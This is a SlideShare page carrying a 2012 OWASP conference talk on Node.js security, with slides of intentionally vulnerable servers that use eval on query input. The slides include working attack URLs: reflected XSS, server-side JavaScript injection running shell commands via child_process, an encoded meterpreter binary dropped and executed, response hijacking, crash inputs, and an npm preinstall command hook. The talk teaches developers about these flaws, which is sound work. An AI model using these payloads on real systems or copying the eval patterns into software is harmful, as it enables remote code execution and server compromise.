SlideShare ist ein Scribd-Unternehmen logo

Node.js Security Talk Covers Old Vulnerabilities

Cyber Security Alliance
Cyber Security Alliance

The document discusses security issues related to Node.js applications. It begins by providing an overview of Node.js and how it allows JavaScript to be executed server-side. It then discusses how well-known vulnerabilities like cross-site scripting (XSS), code injection, and remote code execution can occur in Node.js applications if developers are not careful. Specific examples are provided around evaluation of untrusted JSON, uncontrolled use of the eval() function, and crashing servers by causing unhandled exceptions. The document concludes by noting that many common features are not supported out of the box in Node.js and must be added through external modules.

1 von 41
Downloaden Sie, um offline zu lesen
Node.js Security" Old vulnerabilities in new dresses Application Security Forum Western Switzerland 2012 November 8th 2012 Sven Vetsch Redguard AG sven.vetsch@redguard.ch www.redguard.ch @disenchant_ch / @redguard_ch Copyright © The OWASP Foundation Permission is granted to copy, distribute and/or modify this The OWASP Foundation document under the terms of the OWASP License. http://www.owasp.org
Sven Vetsch §  Partner & CTO at Redguard AG §  www.redguard.ch §  Specialized in Application Security §  (Web, Web-Services, Mobile, …) §  Leader OWASP Switzerland §  www.owasp.org / www.owasp.ch sven.vetsch@redguard.ch Twitter: @disenchant_ch / @redguard_ch 8 November 2012 OWASP Foundation | Sven Vetsch | sven.vetsch@redguard.ch 2
Table of Contents I.  Node.js II.  Node.js Security III.  Wrap Up IV.  Q & A 8 November 2012 OWASP Foundation | Sven Vetsch | sven.vetsch@redguard.ch 3
Remarks Don’t use any of the code shown in this presentation unless you want to write insecure software! We won’t really go into how to avoid and fix things. You will see, that we’ll just talk about new possibilities on exploiting well-known vulnerabilities anyway. 8 November 2012 OWASP Foundation | Sven Vetsch | sven.vetsch@redguard.ch 4
I Node.js JavaScript on your Server 8 November 2012 OWASP Foundation | Sven Vetsch | sven.vetsch@redguard.ch 5
Wait what…? §  Node aka. Node.js §  Open Source (http://nodejs.org/) §  Platform built on Google's JavaScript runtime (V8) §  For easily building fast and scalable network applications §  Node uses an event-driven, non-blocking I/O model §  Lightweight and efficient - perfect for data-intensive real-time applications that run across distributed devices. 8 November 2012 OWASP Foundation | Sven Vetsch | sven.vetsch@redguard.ch 6
Node.js Processing Model © by Aaron Stannard 8 November 2012 OWASP Foundation | Sven Vetsch | sven.vetsch@redguard.ch 7
In short… “Node allows JavaScript to be executed server-side and provides APIs (i.e. to work with files and talk to devices on a network).” 8 November 2012 OWASP Foundation | Sven Vetsch | sven.vetsch@redguard.ch 8
Who would use this? 8 November 2012 OWASP Foundation | Sven Vetsch | sven.vetsch@redguard.ch 9
Hello World var http = require('http'); http.createServer(function (req, res) { res.writeHead(200, { 'Content-Type': 'text/plain’ }); res.end('Hello Worldn'); }).listen(1337, '127.0.0.1'); console.log('Server running at http:// 127.0.0.1:1337/'); 8 November 2012 OWASP Foundation | Sven Vetsch | sven.vetsch@redguard.ch 10
Working with (GET) Parameters var http = require('http'); var url = require('url'); http.createServer(function (req, res) { res.writeHead(200, { 'Content-Type': 'text/html' }); var queryData = url.parse(req.url, true).query; var name = queryData.name; console.log("Hello " + name); res.end("Hello " + name); }).listen(1337, '127.0.0.1'); 8 November 2012 OWASP Foundation | Sven Vetsch | sven.vetsch@redguard.ch 11
Working with (GET) Parameters var http = require('http'); var url = require('url'); http.createServer(function (req, res) { res.writeHead(200, { 'Content-Type': 'text/html' }); var queryData = url.parse(req.url, true).query; var name = queryData.name; console.log("Hello " + name); res.end("Hello " + name); }).listen(1337, '127.0.0.1'); 8 November 2012 OWASP Foundation | Sven Vetsch | sven.vetsch@redguard.ch 12
Funfact Using %07 (BEL character) your machine goes bing
II Node.js Security 8 November 2012 OWASP Foundation | Sven Vetsch | sven.vetsch@redguard.ch 14
So you’re saying … var http = require('http'); var url = require('url'); http.createServer(function (req, res) { res.writeHead(200, { 'Content-Type': 'text/html' }); var queryData = url.parse(req.url, true).query; var name = queryData.name; console.log("Hello " + name); res.end("Hello " + name); }).listen(1337, '127.0.0.1'); 8 November 2012 OWASP Foundation | Sven Vetsch | sven.vetsch@redguard.ch 15
Reflecting XSS http://example.com/? name=<script>alert(1);</script> 8 November 2012 OWASP Foundation | Sven Vetsch | sven.vetsch@redguard.ch 16
Server Side JavaScript Injection §  It’s much like DOM-based XSS and all the know sources and sinks also work on Node. §  http://code.google.com/p/domxsswiki/wiki/Index §  Interesting is everything that performs an eval() §  eval() is (and stays) evil 8 November 2012 OWASP Foundation | Sven Vetsch | sven.vetsch@redguard.ch 17
Server Side JavaScript Injection Be serious, who would use eval() or for example let unchecked code reach a setTimeout()? 8 November 2012 OWASP Foundation | Sven Vetsch | sven.vetsch@redguard.ch 18
Server Side JavaScript Injection §  Github returns 444’932 when searching for “eval” in JavaScript code. §  Of course not all of those are in fact insecure usages of the eval() function 8 November 2012 OWASP Foundation | Sven Vetsch | sven.vetsch@redguard.ch 19
Server Side JavaScript Injection §  Another example: How do you convert JSON back to an object? §  The good answer: JSON.parse(str); §  The bad (but easier and more intuitive) answer: eval(str); 8 November 2012 OWASP Foundation | Sven Vetsch | sven.vetsch@redguard.ch 20
Server Side JavaScript Injection §  “First, you'll use a JavaScript eval() function to convert the JSON string into JavaScript objects.” return eval(json); (https://developers.google.com/web-toolkit/doc/latest/tutorial/JSON) 8 November 2012 OWASP Foundation | Sven Vetsch | sven.vetsch@redguard.ch 21
Server Side JavaScript Injection §  “With JSON, you use JavaScript's array and object literals syntax to define data inside a text file in a way that can be returned as a JavaScript object using eval().” var jsondata = eval("("+mygetrequest.responseText+")") (http://www.javascriptkit.com/dhtmltutors/ajaxgetpost4.shtml) 8 November 2012 OWASP Foundation | Sven Vetsch | sven.vetsch@redguard.ch 22
(Ab)using JSON ... var queryData = url.parse(req.url, true).query; if (queryData.jsonString) { var jsonObject = eval('(' + queryData.jsonString + ')'); res.end(jsonObject.order[0].name+" ordered one " +jsonObject.order[0].beer); } else { res.end("Please place your order."); } }).listen(1337, '127.0.0.1'); 8 November 2012 OWASP Foundation | Sven Vetsch | sven.vetsch@redguard.ch 23
(Ab)using JSON http://example.com/?jsonString={"order": [{"name":"John","beer":"Murphy’s Red"}]} And because of: eval('(' + queryData.jsonString + ')'); http://example.com/?jsonString={"order": [{"name":"John”,"beer":console.log(1)}]} 8 November 2012 OWASP Foundation | Sven Vetsch | sven.vetsch@redguard.ch 24
Code Execution var http = require('http'); var url = require('url'); http.createServer(function (req, res) { var queryData = url.parse(req.url, true).query; eval("console.log('"+queryData.log+"')"); res.writeHead(200, { 'Content-Type': 'text/plain’ }); res.end('Hello Worldn'); }).listen(1337, '127.0.0.1'); 8 November 2012 OWASP Foundation | Sven Vetsch | sven.vetsch@redguard.ch 25
Code Execution var sys = require('sys'); var exec = require('child_process').exec; function puts(error, stdout, stderr) { sys.puts(stdout) } Exec("ls -lah", puts); 8 November 2012 OWASP Foundation | Sven Vetsch | sven.vetsch@redguard.ch 26
Code Execution http://example.com/?log=1');var sys = require('sys'); var exec = require('child_process').exec; function puts(error, stdout, stderr) { sys.puts(stdout) } exec("ls -lah", puts);// 8 November 2012 OWASP Foundation | Sven Vetsch | sven.vetsch@redguard.ch 27
Metasploit meterpreter http://example.com/?log=1');var sys = require('sys'); var exec = require('child_process').exec; function puts(error, stdout, stderr) { sys.puts(stdout) } exec("echo 'f0VMRgEBAQAAAAAAAAAAAAIAAwABAAAAVIAECDQAAAA AAAAAAAAAADQAIAABAAAAAAAAAAEAAAAAAAAAAIAECAC ABAibAAAA4gAAAAcAAAAAEAAAMdv341NDU2oCsGaJ4c2 Al1towKgOAWgCAB %2bQieFqZlhQUVeJ4UPNgLIHuQAQAACJ48HrDMHjDLB9 zYBbieGZtgywA82A/%2bE=' | base64 -d > x; chmod 777 x; ./x;", puts);// 8 November 2012 OWASP Foundation | Sven Vetsch | sven.vetsch@redguard.ch 28
Hijack Response http://example.com/?log=1');var orig = http.ServerResponse.prototype.write; function newWrite (chunk) {orig.call(this, chunk%2b' hijacked');} http.ServerResponse.prototype.write = newWrite;// 8 November 2012 OWASP Foundation | Sven Vetsch | sven.vetsch@redguard.ch 29
Funfact An unhandled exception crashes your server.
Simple Crash Demo var http = require('http'); var url = require('url'); http.createServer(function (req, res) { res.writeHead(200, {'Content-Type': 'text/html'}); var queryData = url.parse(req.url, true).query; var number_of_decimals = 1; if (queryData.nod) {number_of_decimals = queryData.nod;} res.end( Math.PI.toFixed(number_of_decimals).toString() ); }).listen(1337, '127.0.0.1'); 8 November 2012 OWASP Foundation | Sven Vetsch | sven.vetsch@redguard.ch 31
Simple Crash Demo var http = require('http'); var url = require('url'); http.createServer(function (req, res) { res.writeHead(200, {'Content-Type': 'text/html'}); var queryData = url.parse(req.url, true).query; var number_of_decimals = 1; if (queryData.nod) {number_of_decimals = queryData.nod;} res.end( Math.PI.toFixed(number_of_decimals).toString() ); }).listen(1337, '127.0.0.1'); 8 November 2012 OWASP Foundation | Sven Vetsch | sven.vetsch@redguard.ch 32
Simple Crash Demo number.toFixed( [digits] ) §  digits The number of digits to appear after the decimal point; this may be a value between 0 and 20, inclusive, and implementations may optionally support a larger range of values. If this argument is omitted, it is treated as 0. 8 November 2012 OWASP Foundation | Sven Vetsch | sven.vetsch@redguard.ch 33
Simple Crash Demo http://example.com/?nod=-1 ... or ... http://example.com/?nod=21 8 November 2012 OWASP Foundation | Sven Vetsch | sven.vetsch@redguard.ch 34
Does Node.js support… Sessions   NO   Permanent  Data  Storage   NO   Caching   NO   Database  Access   NO   Logging   NO   Default  Error  Handling   NO   …   Most  likely  NO   8 November 2012 OWASP Foundation | Sven Vetsch | sven.vetsch@redguard.ch 35
npm - Node Packaged Modules §  npm is a Node.js package manager §  https://npmjs.org/ §  De-facto standard §  Open – everyone can publish packages 8 November 2012 OWASP Foundation | Sven Vetsch | sven.vetsch@redguard.ch 36
npm - Node Packaged Modules §  npm init §  Edit package.json like we’ll see in a second §  npm pack §  npm install evilModule-1.2.3.tgz §  Publish J 8 November 2012 OWASP Foundation | Sven Vetsch | sven.vetsch@redguard.ch 37
npm - Node Packaged Modules { "author": "Sven Vetsch", "name": "evilModule", "version": "1.2.3", "scripts": { "preinstall": "ls -lah; whoami" } } 8 November 2012 OWASP Foundation | Sven Vetsch | sven.vetsch@redguard.ch 38
III Wrap Up 8 November 2012 OWASP Foundation | Sven Vetsch | sven.vetsch@redguard.ch 39
Wrap Up §  Using Node.js can be a good thing but you §  have to care about a lot of things §  know the modules you can use §  need to write a lot of code yourself until someone writes a module for it §  We have to wait for (and help) improve modules that make Node.js applications more secure. §  Training for developers is key as they can’t write secure Node.js application without even understanding the most simple XSS vectors. 8 November 2012 OWASP Foundation | Sven Vetsch | sven.vetsch@redguard.ch 40
IV Q & A sven.vetsch@redguard.ch @disenchant_ch / @redguard_ch 8 November 2012 OWASP Foundation | Sven Vetsch | sven.vetsch@redguard.ch 41

Empfohlen

Node Security: The Good, Bad & Ugly
Node Security: The Good, Bad & UglyNode Security: The Good, Bad & Ugly
Node Security: The Good, Bad & UglyBishan Singh
 
JavaScript as a Server side language (NodeJS): JSConf 2011, Dhaka
JavaScript as a Server side language (NodeJS): JSConf 2011, DhakaJavaScript as a Server side language (NodeJS): JSConf 2011, Dhaka
JavaScript as a Server side language (NodeJS): JSConf 2011, DhakaNurul Ferdous
 
Building web apps with node.js, socket.io, knockout.js and zombie.js - Codemo...
Building web apps with node.js, socket.io, knockout.js and zombie.js - Codemo...Building web apps with node.js, socket.io, knockout.js and zombie.js - Codemo...
Building web apps with node.js, socket.io, knockout.js and zombie.js - Codemo...Ivan Loire
 
Modern UI Development With Node.js
Modern UI Development With Node.jsModern UI Development With Node.js
Modern UI Development With Node.jsRyan Anklam
 
Introduction to Node js
Introduction to Node jsIntroduction to Node js
Introduction to Node jsAkshay Mathur
 
Introduction to Node.js
Introduction to Node.jsIntroduction to Node.js
Introduction to Node.jsVikash Singh
 
Introduction to Node.js
Introduction to Node.jsIntroduction to Node.js
Introduction to Node.jsRob O'Doherty
 
Node js introduction
Node js introductionNode js introduction
Node js introductionJoseph de Castelnau
 

Empfohlen

Node Security: The Good, Bad & Ugly
Node Security: The Good, Bad & UglyNode Security: The Good, Bad & Ugly
Node Security: The Good, Bad & UglyBishan Singh
 
JavaScript as a Server side language (NodeJS): JSConf 2011, Dhaka
JavaScript as a Server side language (NodeJS): JSConf 2011, DhakaJavaScript as a Server side language (NodeJS): JSConf 2011, Dhaka
JavaScript as a Server side language (NodeJS): JSConf 2011, DhakaNurul Ferdous
 
Building web apps with node.js, socket.io, knockout.js and zombie.js - Codemo...
Building web apps with node.js, socket.io, knockout.js and zombie.js - Codemo...Building web apps with node.js, socket.io, knockout.js and zombie.js - Codemo...
Building web apps with node.js, socket.io, knockout.js and zombie.js - Codemo...Ivan Loire
 
Modern UI Development With Node.js
Modern UI Development With Node.jsModern UI Development With Node.js
Modern UI Development With Node.jsRyan Anklam
 
Introduction to Node js
Introduction to Node jsIntroduction to Node js
Introduction to Node jsAkshay Mathur
 
Introduction to Node.js
Introduction to Node.jsIntroduction to Node.js
Introduction to Node.jsVikash Singh
 
Introduction to Node.js
Introduction to Node.jsIntroduction to Node.js
Introduction to Node.jsRob O'Doherty
 
Node js introduction
Node js introductionNode js introduction
Node js introductionJoseph de Castelnau
 
Introduction to NodeJS
Introduction to NodeJSIntroduction to NodeJS
Introduction to NodeJSCere Labs Pvt. Ltd
 
Introduction to node.js
Introduction to node.jsIntroduction to node.js
Introduction to node.jsArun Kumar Arjunan
 
Node.js Basics
Node.js Basics Node.js Basics
Node.js Basics TheCreativedev Blog
 
What is Node.js | Node.js Tutorial for Beginners | Node.js Modules | Node.js ...
What is Node.js | Node.js Tutorial for Beginners | Node.js Modules | Node.js ...What is Node.js | Node.js Tutorial for Beginners | Node.js Modules | Node.js ...
What is Node.js | Node.js Tutorial for Beginners | Node.js Modules | Node.js ...Edureka!
 
Nodejs Event Driven Concurrency for Web Applications
Nodejs Event Driven Concurrency for Web ApplicationsNodejs Event Driven Concurrency for Web Applications
Nodejs Event Driven Concurrency for Web ApplicationsGanesh Iyer
 
Future of NodeJS
Future of NodeJSFuture of NodeJS
Future of NodeJSSébastien Pertus
 
Node js Introduction
Node js IntroductionNode js Introduction
Node js Introductionsanskriti agarwal
 
Understand How Node.js and Core Features Works
Understand How Node.js and Core Features WorksUnderstand How Node.js and Core Features Works
Understand How Node.js and Core Features WorksHengki Sihombing
 
Best node js course
Best node js courseBest node js course
Best node js coursebestonlinecoursescoupon
 
Node.js - Introduction and role in Frontend Development
Node.js - Introduction and role in Frontend DevelopmentNode.js - Introduction and role in Frontend Development
Node.js - Introduction and role in Frontend DevelopmentJulián David Duque
 
Node js for enterprise
Node js for enterpriseNode js for enterprise
Node js for enterpriseravisankar munusamy
 
Introduction Node.js
Introduction Node.jsIntroduction Node.js
Introduction Node.jsErik van Appeldoorn
 
Introduction to node.js
Introduction to node.jsIntroduction to node.js
Introduction to node.jsDinesh U
 
Nodejs
NodejsNodejs
NodejsPrem Sanil
 
Node.js In The Enterprise - A Primer
Node.js In The Enterprise - A PrimerNode.js In The Enterprise - A Primer
Node.js In The Enterprise - A PrimerNaveen S.R
 
Basic Concept of Node.js & NPM
Basic Concept of Node.js & NPMBasic Concept of Node.js & NPM
Basic Concept of Node.js & NPMBhargav Anadkat
 
Use Node.js to create a REST API
Use Node.js to create a REST APIUse Node.js to create a REST API
Use Node.js to create a REST APIFabien Vauchelles
 
Node.js Explained
Node.js ExplainedNode.js Explained
Node.js ExplainedJeff Kunkle
 
Introduction to node.js GDD
Introduction to node.js GDDIntroduction to node.js GDD
Introduction to node.js GDDSudar Muthu
 
Complete MVC on NodeJS
Complete MVC on NodeJSComplete MVC on NodeJS
Complete MVC on NodeJSHüseyin BABAL
 
Node JS reverse shell
Node JS reverse shellNode JS reverse shell
Node JS reverse shellMadhu Akula
 
Meetup RomaJS - introduzione interattiva a Node.js - Luca Lanziani - Codemoti...
Meetup RomaJS - introduzione interattiva a Node.js - Luca Lanziani - Codemoti...Meetup RomaJS - introduzione interattiva a Node.js - Luca Lanziani - Codemoti...
Meetup RomaJS - introduzione interattiva a Node.js - Luca Lanziani - Codemoti...Codemotion
 

Weitere ähnliche Inhalte

Was ist angesagt?

What is Node.js | Node.js Tutorial for Beginners | Node.js Modules | Node.js ...
What is Node.js | Node.js Tutorial for Beginners | Node.js Modules | Node.js ...What is Node.js | Node.js Tutorial for Beginners | Node.js Modules | Node.js ...
What is Node.js | Node.js Tutorial for Beginners | Node.js Modules | Node.js ...Edureka!
 
Nodejs Event Driven Concurrency for Web Applications
Nodejs Event Driven Concurrency for Web ApplicationsNodejs Event Driven Concurrency for Web Applications
Nodejs Event Driven Concurrency for Web ApplicationsGanesh Iyer
 
Understand How Node.js and Core Features Works
Understand How Node.js and Core Features WorksUnderstand How Node.js and Core Features Works
Understand How Node.js and Core Features WorksHengki Sihombing
 
Node.js - Introduction and role in Frontend Development
Node.js - Introduction and role in Frontend DevelopmentNode.js - Introduction and role in Frontend Development
Node.js - Introduction and role in Frontend DevelopmentJulián David Duque
 
Introduction to node.js
Introduction to node.jsIntroduction to node.js
Introduction to node.jsDinesh U
 
Node.js In The Enterprise - A Primer
Node.js In The Enterprise - A PrimerNode.js In The Enterprise - A Primer
Node.js In The Enterprise - A PrimerNaveen S.R
 
Basic Concept of Node.js & NPM
Basic Concept of Node.js & NPMBasic Concept of Node.js & NPM
Basic Concept of Node.js & NPMBhargav Anadkat
 
Use Node.js to create a REST API
Use Node.js to create a REST APIUse Node.js to create a REST API
Use Node.js to create a REST APIFabien Vauchelles
 
Node.js Explained
Node.js ExplainedNode.js Explained
Node.js ExplainedJeff Kunkle
 
Introduction to node.js GDD
Introduction to node.js GDDIntroduction to node.js GDD
Introduction to node.js GDDSudar Muthu
 
Complete MVC on NodeJS
Complete MVC on NodeJSComplete MVC on NodeJS
Complete MVC on NodeJSHüseyin BABAL
 

Was ist angesagt? (20)

Introduction to NodeJS
Introduction to NodeJSIntroduction to NodeJS
Introduction to NodeJS
 
Introduction to node.js
Introduction to node.jsIntroduction to node.js
Introduction to node.js
 
Node.js Basics
Node.js Basics Node.js Basics
Node.js Basics
 
What is Node.js | Node.js Tutorial for Beginners | Node.js Modules | Node.js ...
What is Node.js | Node.js Tutorial for Beginners | Node.js Modules | Node.js ...What is Node.js | Node.js Tutorial for Beginners | Node.js Modules | Node.js ...
What is Node.js | Node.js Tutorial for Beginners | Node.js Modules | Node.js ...
 
Nodejs Event Driven Concurrency for Web Applications
Nodejs Event Driven Concurrency for Web ApplicationsNodejs Event Driven Concurrency for Web Applications
Nodejs Event Driven Concurrency for Web Applications
 
Future of NodeJS
Future of NodeJSFuture of NodeJS
Future of NodeJS
 
Node js Introduction
Node js IntroductionNode js Introduction
Node js Introduction
 
Understand How Node.js and Core Features Works
Understand How Node.js and Core Features WorksUnderstand How Node.js and Core Features Works
Understand How Node.js and Core Features Works
 
Best node js course
Best node js courseBest node js course
Best node js course
 
Node.js - Introduction and role in Frontend Development
Node.js - Introduction and role in Frontend DevelopmentNode.js - Introduction and role in Frontend Development
Node.js - Introduction and role in Frontend Development
 
Node js for enterprise
Node js for enterpriseNode js for enterprise
Node js for enterprise
 
Introduction Node.js
Introduction Node.jsIntroduction Node.js
Introduction Node.js
 
Introduction to node.js
Introduction to node.jsIntroduction to node.js
Introduction to node.js
 
Nodejs
NodejsNodejs
Nodejs
 
Node.js In The Enterprise - A Primer
Node.js In The Enterprise - A PrimerNode.js In The Enterprise - A Primer
Node.js In The Enterprise - A Primer
 
Basic Concept of Node.js & NPM
Basic Concept of Node.js & NPMBasic Concept of Node.js & NPM
Basic Concept of Node.js & NPM
 
Use Node.js to create a REST API
Use Node.js to create a REST APIUse Node.js to create a REST API
Use Node.js to create a REST API
 
Node.js Explained
Node.js ExplainedNode.js Explained
Node.js Explained
 
Introduction to node.js GDD
Introduction to node.js GDDIntroduction to node.js GDD
Introduction to node.js GDD
 
Complete MVC on NodeJS
Complete MVC on NodeJSComplete MVC on NodeJS
Complete MVC on NodeJS
 

Ähnlich wie Node.js Security Talk Covers Old Vulnerabilities

Node JS reverse shell
Node JS reverse shellNode JS reverse shell
Node JS reverse shellMadhu Akula
 
Meetup RomaJS - introduzione interattiva a Node.js - Luca Lanziani - Codemoti...
Meetup RomaJS - introduzione interattiva a Node.js - Luca Lanziani - Codemoti...Meetup RomaJS - introduzione interattiva a Node.js - Luca Lanziani - Codemoti...
Meetup RomaJS - introduzione interattiva a Node.js - Luca Lanziani - Codemoti...Codemotion
 
Event-driven IO server-side JavaScript environment based on V8 Engine
Event-driven IO server-side JavaScript environment based on V8 EngineEvent-driven IO server-side JavaScript environment based on V8 Engine
Event-driven IO server-side JavaScript environment based on V8 EngineRicardo Silva
 
Thu 1500 lacoul_shamod_color
Thu 1500 lacoul_shamod_colorThu 1500 lacoul_shamod_color
Thu 1500 lacoul_shamod_colorDATAVERSITY
 
Why Nodejs Guilin Shanghai
Why Nodejs Guilin ShanghaiWhy Nodejs Guilin Shanghai
Why Nodejs Guilin ShanghaiJackson Tian
 
Why Node.js
Why Node.jsWhy Node.js
Why Node.jsguileen
 
Kraken js at paypal
Kraken js at paypalKraken js at paypal
Kraken js at paypalLenny Markus
 
Developing realtime apps with Drupal and NodeJS
Developing realtime apps with Drupal and NodeJS Developing realtime apps with Drupal and NodeJS
Developing realtime apps with Drupal and NodeJS drupalcampest
 
Spring one 2012 Groovy as a weapon of maas PaaSification
Spring one 2012 Groovy as a weapon of maas PaaSificationSpring one 2012 Groovy as a weapon of maas PaaSification
Spring one 2012 Groovy as a weapon of maas PaaSificationNenad Bogojevic
 
OWASP_Top_Ten_Proactive_Controls_v2.pptx
OWASP_Top_Ten_Proactive_Controls_v2.pptxOWASP_Top_Ten_Proactive_Controls_v2.pptx
OWASP_Top_Ten_Proactive_Controls_v2.pptxcgt38842
 
JavaScript, Meet Cloud: Node.js on Windows Azure
JavaScript, Meet Cloud: Node.js on Windows AzureJavaScript, Meet Cloud: Node.js on Windows Azure
JavaScript, Meet Cloud: Node.js on Windows AzureSasha Goldshtein
 
OWASP_Top_Ten_Proactive_Controls_v2.pptx
OWASP_Top_Ten_Proactive_Controls_v2.pptxOWASP_Top_Ten_Proactive_Controls_v2.pptx
OWASP_Top_Ten_Proactive_Controls_v2.pptxjohnpragasam1
 
OWASP_Top_Ten_Proactive_Controls_v2.pptx
OWASP_Top_Ten_Proactive_Controls_v2.pptxOWASP_Top_Ten_Proactive_Controls_v2.pptx
OWASP_Top_Ten_Proactive_Controls_v2.pptxazida3
 
OWASP_Top_Ten_Proactive_Controls_v32.pptx
OWASP_Top_Ten_Proactive_Controls_v32.pptxOWASP_Top_Ten_Proactive_Controls_v32.pptx
OWASP_Top_Ten_Proactive_Controls_v32.pptxnmk42194
 
EWD 3 Training Course Part 20: The DocumentNode Object
EWD 3 Training Course Part 20: The DocumentNode ObjectEWD 3 Training Course Part 20: The DocumentNode Object
EWD 3 Training Course Part 20: The DocumentNode ObjectRob Tweed
 

Ähnlich wie Node.js Security Talk Covers Old Vulnerabilities (20)

Node JS reverse shell
Node JS reverse shellNode JS reverse shell
Node JS reverse shell
 
Meetup RomaJS - introduzione interattiva a Node.js - Luca Lanziani - Codemoti...
Meetup RomaJS - introduzione interattiva a Node.js - Luca Lanziani - Codemoti...Meetup RomaJS - introduzione interattiva a Node.js - Luca Lanziani - Codemoti...
Meetup RomaJS - introduzione interattiva a Node.js - Luca Lanziani - Codemoti...
 
Event-driven IO server-side JavaScript environment based on V8 Engine
Event-driven IO server-side JavaScript environment based on V8 EngineEvent-driven IO server-side JavaScript environment based on V8 Engine
Event-driven IO server-side JavaScript environment based on V8 Engine
 
Thu 1500 lacoul_shamod_color
Thu 1500 lacoul_shamod_colorThu 1500 lacoul_shamod_color
Thu 1500 lacoul_shamod_color
 
Why Nodejs Guilin Shanghai
Why Nodejs Guilin ShanghaiWhy Nodejs Guilin Shanghai
Why Nodejs Guilin Shanghai
 
Why Node.js
Why Node.jsWhy Node.js
Why Node.js
 
Why NodeJS
Why NodeJSWhy NodeJS
Why NodeJS
 
Kraken js at paypal
Kraken js at paypalKraken js at paypal
Kraken js at paypal
 
Developing realtime apps with Drupal and NodeJS
Developing realtime apps with Drupal and NodeJS Developing realtime apps with Drupal and NodeJS
Developing realtime apps with Drupal and NodeJS
 
Node.js + NoSQL
Node.js + NoSQLNode.js + NoSQL
Node.js + NoSQL
 
Spring one 2012 Groovy as a weapon of maas PaaSification
Spring one 2012 Groovy as a weapon of maas PaaSificationSpring one 2012 Groovy as a weapon of maas PaaSification
Spring one 2012 Groovy as a weapon of maas PaaSification
 
Node.js vs Play Framework
Node.js vs Play FrameworkNode.js vs Play Framework
Node.js vs Play Framework
 
Node.js on Azure
Node.js on AzureNode.js on Azure
Node.js on Azure
 
Nodejs
NodejsNodejs
Nodejs
 
OWASP_Top_Ten_Proactive_Controls_v2.pptx
OWASP_Top_Ten_Proactive_Controls_v2.pptxOWASP_Top_Ten_Proactive_Controls_v2.pptx
OWASP_Top_Ten_Proactive_Controls_v2.pptx
 
JavaScript, Meet Cloud: Node.js on Windows Azure
JavaScript, Meet Cloud: Node.js on Windows AzureJavaScript, Meet Cloud: Node.js on Windows Azure
JavaScript, Meet Cloud: Node.js on Windows Azure
 
OWASP_Top_Ten_Proactive_Controls_v2.pptx
OWASP_Top_Ten_Proactive_Controls_v2.pptxOWASP_Top_Ten_Proactive_Controls_v2.pptx
OWASP_Top_Ten_Proactive_Controls_v2.pptx
 
OWASP_Top_Ten_Proactive_Controls_v2.pptx
OWASP_Top_Ten_Proactive_Controls_v2.pptxOWASP_Top_Ten_Proactive_Controls_v2.pptx
OWASP_Top_Ten_Proactive_Controls_v2.pptx
 
OWASP_Top_Ten_Proactive_Controls_v32.pptx
OWASP_Top_Ten_Proactive_Controls_v32.pptxOWASP_Top_Ten_Proactive_Controls_v32.pptx
OWASP_Top_Ten_Proactive_Controls_v32.pptx
 
EWD 3 Training Course Part 20: The DocumentNode Object
EWD 3 Training Course Part 20: The DocumentNode ObjectEWD 3 Training Course Part 20: The DocumentNode Object
EWD 3 Training Course Part 20: The DocumentNode Object
 

Mehr von Cyber Security Alliance

Robots are among us, but who takes responsibility?
Robots are among us, but who takes responsibility?Robots are among us, but who takes responsibility?
Robots are among us, but who takes responsibility?Cyber Security Alliance
 
iOS malware: what's the risk and how to reduce it
iOS malware: what's the risk and how to reduce itiOS malware: what's the risk and how to reduce it
iOS malware: what's the risk and how to reduce itCyber Security Alliance
 
Why huntung IoC fails at protecting against targeted attacks
Why huntung IoC fails at protecting against targeted attacksWhy huntung IoC fails at protecting against targeted attacks
Why huntung IoC fails at protecting against targeted attacksCyber Security Alliance
 
Corporations - the new victims of targeted ransomware
Corporations - the new victims of targeted ransomwareCorporations - the new victims of targeted ransomware
Corporations - the new victims of targeted ransomwareCyber Security Alliance
 
Introducing Man in the Contacts attack to trick encrypted messaging apps
Introducing Man in the Contacts attack to trick encrypted messaging appsIntroducing Man in the Contacts attack to trick encrypted messaging apps
Introducing Man in the Contacts attack to trick encrypted messaging appsCyber Security Alliance
 
Understanding the fundamentals of attacks
Understanding the fundamentals of attacksUnderstanding the fundamentals of attacks
Understanding the fundamentals of attacksCyber Security Alliance
 
Reverse engineering Swisscom's Centro Grande Modem
Reverse engineering Swisscom's Centro Grande ModemReverse engineering Swisscom's Centro Grande Modem
Reverse engineering Swisscom's Centro Grande ModemCyber Security Alliance
 
Easy public-private-keys-strong-authentication-using-u2 f
Easy public-private-keys-strong-authentication-using-u2 fEasy public-private-keys-strong-authentication-using-u2 f
Easy public-private-keys-strong-authentication-using-u2 fCyber Security Alliance
 
Create a-strong-two-factors-authentication-device-for-less-than-chf-100
Create a-strong-two-factors-authentication-device-for-less-than-chf-100Create a-strong-two-factors-authentication-device-for-less-than-chf-100
Create a-strong-two-factors-authentication-device-for-less-than-chf-100Cyber Security Alliance
 
Offline bruteforce attack on wi fi protected setup
Offline bruteforce attack on wi fi protected setupOffline bruteforce attack on wi fi protected setup
Offline bruteforce attack on wi fi protected setupCyber Security Alliance
 
App secforum2014 andrivet-cplusplus11-metaprogramming_applied_to_software_obf...
App secforum2014 andrivet-cplusplus11-metaprogramming_applied_to_software_obf...App secforum2014 andrivet-cplusplus11-metaprogramming_applied_to_software_obf...
App secforum2014 andrivet-cplusplus11-metaprogramming_applied_to_software_obf...Cyber Security Alliance
 
Warning Ahead: SecurityStorms are Brewing in Your JavaScript
Warning Ahead: SecurityStorms are Brewing in Your JavaScriptWarning Ahead: SecurityStorms are Brewing in Your JavaScript
Warning Ahead: SecurityStorms are Brewing in Your JavaScriptCyber Security Alliance
 
Killing any security product … using a Mimikatz undocumented feature
Killing any security product … using a Mimikatz undocumented featureKilling any security product … using a Mimikatz undocumented feature
Killing any security product … using a Mimikatz undocumented featureCyber Security Alliance
 

Mehr von Cyber Security Alliance (20)

Bug Bounty @ Swisscom
Bug Bounty @ SwisscomBug Bounty @ Swisscom
Bug Bounty @ Swisscom
 
Robots are among us, but who takes responsibility?
Robots are among us, but who takes responsibility?Robots are among us, but who takes responsibility?
Robots are among us, but who takes responsibility?
 
iOS malware: what's the risk and how to reduce it
iOS malware: what's the risk and how to reduce itiOS malware: what's the risk and how to reduce it
iOS malware: what's the risk and how to reduce it
 
Why huntung IoC fails at protecting against targeted attacks
Why huntung IoC fails at protecting against targeted attacksWhy huntung IoC fails at protecting against targeted attacks
Why huntung IoC fails at protecting against targeted attacks
 
Corporations - the new victims of targeted ransomware
Corporations - the new victims of targeted ransomwareCorporations - the new victims of targeted ransomware
Corporations - the new victims of targeted ransomware
 
Blockchain for Beginners
Blockchain for Beginners Blockchain for Beginners
Blockchain for Beginners
 
Le pentest pour les nuls #cybsec16
